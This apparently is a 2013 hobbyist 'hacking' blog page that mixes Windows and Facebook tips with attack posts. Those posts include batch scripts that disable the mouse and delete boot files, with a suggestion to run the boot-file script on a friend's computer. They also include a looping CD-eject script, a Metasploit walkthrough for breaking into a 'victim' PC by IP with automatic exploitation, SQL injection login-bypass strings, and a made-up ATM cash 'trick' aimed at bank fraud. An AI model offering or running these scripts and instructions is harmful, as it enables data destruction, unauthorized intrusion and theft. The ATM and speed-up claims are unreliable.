Join us on Facebook

Thursday 24 January 2013

PC tip

. [SHIFT] + [alt] + [PrntScrn] – high contrast
A window will open, click OK or simply hit [Enter]. This will enlarge the font on all open Windows and change colors to high contrast. For example the desktop will turn black, what was black text on white background will be reversed. Clicking the same key combination again reverts the changes.

how to start hacking

NOTE: "PLEASE LERN "

Alot of people ask “How do i
learn hacking?”, “Where do i
start?”, “How do i become a
hacker”… and so on. I
answered the question a
million times. Now we all can just give them this link to my
blog. ^^ .This is my opinion
about everything. Others
might think about it in a
different way. Eat it or just
throw it away. 


What is hacking? 

Hacking is a hobby. There are
many ways of hacking. Some
break security systems, some
reverse code.


 In my opinion
everything has to do with
hacking. If you want to become a “hacker”. You have
to get some knowledge in
computer science and love to
play around with it. That’s
basicly everything a hacker
needs ;) . What do i have to learn? This really depends on what
you want to achieve. For
example “I want to learn to
break into systems with tools
out there and i don’t want to
know a programming language”




. For me you are no
hacker then but then you just
need to learn metasploit and
co. ;)
There are some main topics in
my opinion that are important. ♣Using a computer (Linux,
configuration and so on)
♣Networking (Protocols and
how does everything work)
♣Software (Developing and
Reversing) ♣Hardware (How does your
CPU work and so on. Not my
best topic but i got some
knowledge here) Using a computer Most people, who read my
blog, have this knowledge. If
you don’t i give you the
advise to install Linux and play
around with it. Configure
some Apache servers or something like that. Just play
around till you feel
comfortable with it. Compile
some programs and so on. If
you are able to compile your
Linux kernel and use it (maybe with an optimized
configuration for your pc). This
topic should be done for you.
You don’t need to know how
to compile a kernel. Just
feeling comfortable with Linux should proof you know
how to use your computer ;) . The other topics can be learned
parallel. There is no need to
focus on one topic. Networking In my opinion everyone needs
to know how to setup a
network. Learn how to
calculate the subnet mask and
co. This should be easy just
read something about it. Google helps alot here ;) .
Learn how everything works.
Examples are ARP Protocol,
TCP/IP Protocol and how
WLAN works. With this
knowledge you can have alot of fun. You should be able to
MitM attack a router and pc
with this. With this setup
sniffing should be possible. This
is enough knowledge here in
my opinion but depending on your needs you can lern more.
Google topics or interesting
tools ♣pcap (for devs, if you want
or know software
development, this is
interesting for you)
♣arpspoof (dsniff package)
♣fragrouter (-B1 was it if i remember right to do
forwarding so the network
doesn’t break if you hook in
there)
♣dsniff tools etc. All tools you need here are on
the net and knowing a
network can be quite funny
on a LAN Party. Guys never
really never ever login private
pages on a lan party or something like this. Public
networks are public for a
network hacker ;) . Software This is my favorite. I work as
software engineer and i love
this topic. For Reversing this
blog has a tutorial series,
which starts here. Before
learning reversing you have to learn software development. I
recommend every so called
“hacker” to have at least a
basic C knowledge. People
always ask what language do i
have to learn. The question is obsolete. If you know C,
which is a functional language,
very well and want to learn
functional programming in VB.
The only thing that differs is
the syntax. I read very often there are so many differences
and just a hand of people
know assembler. This is just
plain bullshit. I know more
than a hand of people that
reverse code (which will be assembler). ;) Other rumor i
hear often from wannabe
hackers. Are that you use
absolute addresses while
developing assembler and the
compiler creates relative addresses. That’s why nearly
no one knows assembler. That
means knowing assembler
needs basic addition and
subtraction. Yeah a assembler
developer can’t do that -.-. I recommend to learn this
languages in this order: ♣C (functional programming)
♣C++ (Object oriented
programming)
♣Assembler (Low level
programming) Assembler
The masterpiece , i know no-
one who really develops
software with it. Except he is
forced to. Knowing this
language gives you the following advantages: ♣Basic knowledge for
reversing
♣Code optimizing
♣Everyone, who knows
assembler. Can imagine what
the CPU does. Hardware: You should know how a cpu
works and how to read/write
a circuit by a binary table or
formula. This is the basic,
which i know. If you want to
go deeper in this topic. Microcontroller and/or FPGAs
should be your topic. Learning
this topic can be expensive. I
recommend you to learn the
Software part next or better
before this topic. Going deep into hardware engineering
needs software. Conclusions: There is no way to give you a
numbered list what todo/learn
to be a hacker. Hacker just
means that you know
computer science and want to
do experiments with this knowledge. If i had to start
from the beginning i would do
it this way. ♣Install Linux and play around
with it
♣Setup my network in linux
so i got internet :D
♣Learn C/C++ with a book and
all it’s examples ♣Go to a lan party or hotspot
and play around with the
networking tools (don’t do
bad things, if you sniff a
password be happy, you made
it. Don’t use it for bad things! You want to be a hacker not a
cracker)
♣Play around with some
hardware and develope
software Now some years should be
gone and you should have the
knowledge to go alone from
here on. I hope this helps some people
to make the right decisions.
How to start.................

Harmful Virus

CREATE A HARMLESS VIRUS WITH NOTEPAD-
CONTINUOUSLY EJECT CD/DVD
DRIVES.

Copy this code and paste it in
Notepad as Virus.vbs or *.vbs.
Set oWMP = CreateObject("WMPlayer.OCX.7")
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject Next
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000 loop

Double click to open this file

NTFS

About The NTFS

NTFS is an New Technology file system which is the best for Performance in your PC's Hard Drive as its Have Various Features Such as

* Its easily allocated the Space
* The virtual memory Runs smoothly
* uninterruted Facility for Data Storing
* The executing task is very quick and output response is very fast
* Compatiable with 64Bits and 32bits Artitecture environment
* Encyption and Decyption is Fast and Smooth
* Better Compressing Speed
* Sharply Readable to the Data address
* Recoverable almostly

So Always use the NTFS Hard Drive

Disable Mouse :P

Make a virus that disable Mouse...

Today we will be making a batch virus which is harmfull
It will disable your mouse so think before trying it on yourself...

1. Open Notepad and copy below codes

rem ---------------------------------
rem Disable Mouse
set key="HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Mouclass"
reg delete %key%
reg add %key% /v Start /t REG_DWORD /d 4
rem ---------------------------------

2. Save this file as virus.bat
3. Done you just created your virus...

Shutdown Pc

Open notepad and copy/paste this code:

@echo off
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini

Now Save it as a shutdown.bat

This should shutdown the persons computer. It shuts it off once and deletes the files needed to reboot and restart.trY iT on ur frNds compuTer.
I'm nt reSponsIBLe fr ANY daMAgE

List of Most Important Hotkeys

Tips For Win 8

of Most Important Hotkeys
Here is a list of hotkeys to make your Windows 8
experiece even a fun:
Win : switch between the Start screen and the last-
running Windows 8 app
Win + C : displays the Charms: the Settings, Devices,
Share and Search options
Win + D : launches the desktop
Win + E : launches Explorer
Win + F : opens the File Search pane
Win + H : opens the Share pane
Win + I : opens Settings
Win + K : opens the Devices pane
Win + L : locks your PC
Win + M : minimises the current Explorer or Internet Explorer window (works in the full-screen IE, too)
Win + O : toggles device orientation lock on and off
Win + P : switch your display to a second display or projector
Win + Q : open the App Search pane
Win + R : opens the Run box
Win + U : open the Ease of Access Centre
Win + V : cycle through toasts (notifications)
Win + W : search your system settings (type POWER
for links to all power-related options, say)



Win + X : displays a text menu of useful Windows tools and applets
Win + Z : displays the right-click context menu when in a full-screen app
Win + + : launch Magnifier and zoom in
Win + – : zoom out
Win + , : Aero peek at the desktop
Win + Enter : launch Narrator
Win + PgUp : move the current screen to the left- hand monitor
Win + PgDn : move the current screen to the right- hand monitor
Win + PrtSc : capture the current screen and save it to your Pictures folder
Win + Tab : switch between running apps On Tablet:
To take a screenshot on a Windows 8 tablet, simultaneously press the Windows button and the volume-down button on the tablet chassis.


Some of the Keyboard Tricks
Create the ® symbol Alt + 0174 = ®

alt+0176 = ° [degrees for Temperature]

alt+0174 = ® [Registered Trademark]

alt+0153 = ™ [Trade Mark]

alt+169 = ©[Copyright]

Saturday 19 January 2013

Hack your victim PC via IP address

Hack your victim PC via IP address 
***************************

Hello everybody! I am here to show you this magical tool called Metasploit that allows you to hack ANY unpatched computer with only it's IP. Lets begin...

1.) First you need to download Metasploit. The most up-to-date version is FREE at metasploit.com.

2.) You need PostgrSQL for your database.
Download here: http://www.postgresql.org/.
Make sure you use all the defaults or Metasploit woun't work!


3.) Now lets get down to buisness... After installing both tools, open up the PostgrSQL admin gui (start -> all programs -> PostgreSQL 9.0 -> pgAdmin III). Then right-click on your server (in the left hand box) and click connect. Remember to keep this window open the whole time. You will also need the pass you chose to use in step 5...

4.) Time for some hacking! Go to start -> all programs -> Metasploit Framework, and then open the Metasploit gui. Let it load untill it look like this:

5.)Now, in the window type:

db_connect postgres:ThePassYouChose@localhost:5432

The first time you do this you will see lots of text flash buy. Don't wory, this is normal.

6.)Type db_host to make sure you are connected correctally.

7.)Now type this:

db_nmap 000.000.000.000

Make sure you put the ip of the computer you are trying to hack in the place of 000.000.000.000...

7.) Now we get to the fun part; the automatic exploitation. Just type db_autopwn -t -p -e -s -b , watch the auto-exploitation start, go play Halo for a while, and then come back...

8.) After the exploitation is done, type sessions -l to see what the scanner found. If all went well, you should see a list of exploits.

9.) Now we get to use the exploits to hack the computer! If you will notice, all of the exploits are numbered, and they all have obvious names (i. e., reverse Screen_tcp). In order to use an exploit, type this:

sessions -i Exploit Number

__________________________________________________ _________

The features of Metasploit are much like a rat. Once you get into someone's computer, you can see their screen, control their mouse, see what they type, see them, etc.

How to send colorful Text in Facebook Chat???

How to send colorful Text in Facebook Chat???
How to use this code
Copy the code and paste in chat bar. Make sure to insert a space between each alphabetic code.
Eg: kindly follow me for more tricks 

[[107015582669715]] = A
[[116067591741123]] = B
[[115602405121532]] = C
[[112542438763744]] = D
[[115430438474268]] = E
[[109225112442557]] = F
[[111532845537326]] = G
[[111356865552629]] = H
[[109294689102123]] = I
[[126362660720793]] = J



[[116651741681944]] = K
[[115807951764667]] = L
[[106596672714242]] = M
[[108634132504932]] = N
[[116564658357124]] = O
[[111669128857397]] = P
[[107061805996548]] = Q
[[106699962703083]] = R
[[115927268419031]] = S
[[112669162092780]] = T
[[108983579135532]] = U
[[107023745999320]] = V
[[106678406038354]] = W
[[116740548336581]] = X
[[112416755444217]] = Y
[[165724910215]] = Z

Thursday 17 January 2013

Facebook Tips

Try this ;)

Alt + 1 = News Feed
Alt + 2 = Profile Wall
Alt + 3 = Friends
Alt + 4 = Messages
Alt + 5 = Notifications
Alt + 6 = Account Settings
Alt + 7 = Privacy Settings
Alt + 8 = Facebook Official Page
Alt + 9 = Facebook Policies
Alt + 0 = Facebook Help

Wednesday 16 January 2013

HOw to Download all ur Pics frm fb At once

Hello Guy z 2day i,m going to show you how to download all of ur or ur frnd's photos from facebook at once



Goto This link Click here to download
       

U should have fb account for this purpose

Hack Atm MAchine nd Bank Account


You are welcome to the wonder land of hacks, want to know how to hack an ATM MACHINE OR BANK ACCOUNT?
You can hack and break into a bank's security without carrying guns or any weapon.

HOW IS THIS POSSIBLE???


First of all, we have to learn about the manual hacking of ATM MACHINES AND BANKING ACCOUNTSHOW THE ATM MACHINE WORKS?

If you have been to the bank, you find out that the money in the ATM MACHINE is being filled right inside the house where the machine is built with enough security.

 To hack this machine manually, get an ATM card, wether valid or not, as long as it can freely enter into the machine. Then get a candle, light the candle and use the wax to cover the panel on the ATM CARD, covering that panel will make the card look defualt to the machine.           

Now, go to any Bank near you and try this trick, but if you are caught, thats your own wella ooh! not mine. When you get to the machine, insert the card and enter a default pin which is 0000. Done that? Wait and see the action. The atm machine will dispense cash. But some times the machine would say card not smart or it would just eject your card. The reasons is because some atm machines are upgraded while others are not.

HOW DO I KNOW AN UPGRADED MACHINE???

For you to know an upgraded atm machine, you will observe that most times when you use a particular atm machine, as the machine is dispensing the cash, the bank will also send you a debit alert. If the machine is not upgraded, it may take up to 30 minutes before the bank sends a debit alert. The candle trick is 60% efficient on a machine that is not upgrade but it may not work on upgraded machine because of its sensitivity.(use at your own fucking risk do not blaim me :P)

Friday 11 January 2013

Convert Text into Audio using Notepad Trick

Hello Guys, Now I want to tell you a very simple and easy Notepad Trick. By using this trick you can convert your text into audio or voice. This is very easy and simple trick for understand.

You use many softwares which needs heavy space on your Hard Disk Drive. But this Trick needs no space on your HDD. Here is the image of Text to Audio converter.



This converter needs no Internet Connection. It works in offline mode. So check below the tutorial and have fun.
  1. Open Notepad in your PC.
  2. Copy & Paste below VBScript in your Notepad.
  3. Dim msg, sapi
    msg=InputBox("Enter your text for conversion","GeeknTips Text-To-Audio Converter")
    Set sapi=CreateObject("sapi.spvoice")
    sapi.Speak msg
  4. Now Click on "Save As" and give the extension .vbs
Note:- Make Sure you save your Document with .vbs extension.

Speed up your Net 20%


Speed Up Your Net Speed By 20%

1. First you go to start button

2. Go To Run

3. Type gpedit.msc And Then Hit Enter.

4.Then Expand Adminsitrative Templates.

5.Then Network

6.Then QoS Packet Scheduler.

Now A New List Appear . Click On Limit Reservable Bandwidth.
Just Disable it.

Now You Click On Apply .

The Simple SQL Injection HAck :P

The Simple SQL Injection Hack


SQL Injection involves entering SQL code into web forms, eg. login fields, or into the browser address field, to access and manipulate the database behind the site, system or application. When you enter text in the Username and Password fields of a

login screen, the data you input is typically inserted into an SQL command. This command checks the data against the relevant table in the database. If you‘re input matches table/row data, you're granted access (in the case of a login screen). If not, you're knocked back out.




In its simplest form, this is how the SQL Injection works. It's impossible to explain this without reverting to code for just a moment.Here is the code

Suppose we enter the following string in a User name field:


' OR 1=1

The authorization SQL query that is run by the server, the



command which must be satisfied to allow access, will be something along the lines of:


SELECT * FROM users WHERE username = „USRTEXT ' AND password = „PASSTEXT‟

Where USRTEXT and PASSTEXT are what the user enters in the login fields of the web form.

So entering `OR 1=1 — as your username, could result in the following actually being run:

SELECT * FROM users WHERE username = ‗' OR 1=1 — 'AND password = '‘


In terms of login bypass via Injection, the hoary old ' OR 1=1 is just one option. If a hacker thinks a site is vulnerable, there are cheat-sheets all over the web for login strings which can gain access to weak systems. Here are a couple more common strings



which are used to dupe SQL validation routines: username field examples:

• admin'—

• ') or ('a'='a

• ”) or ("a”=”a

• hi” or "a”=”a 



(♥HaXoR♥)

© 2013 Noobs-Acadmy. All rights resevered. Designed by Templateism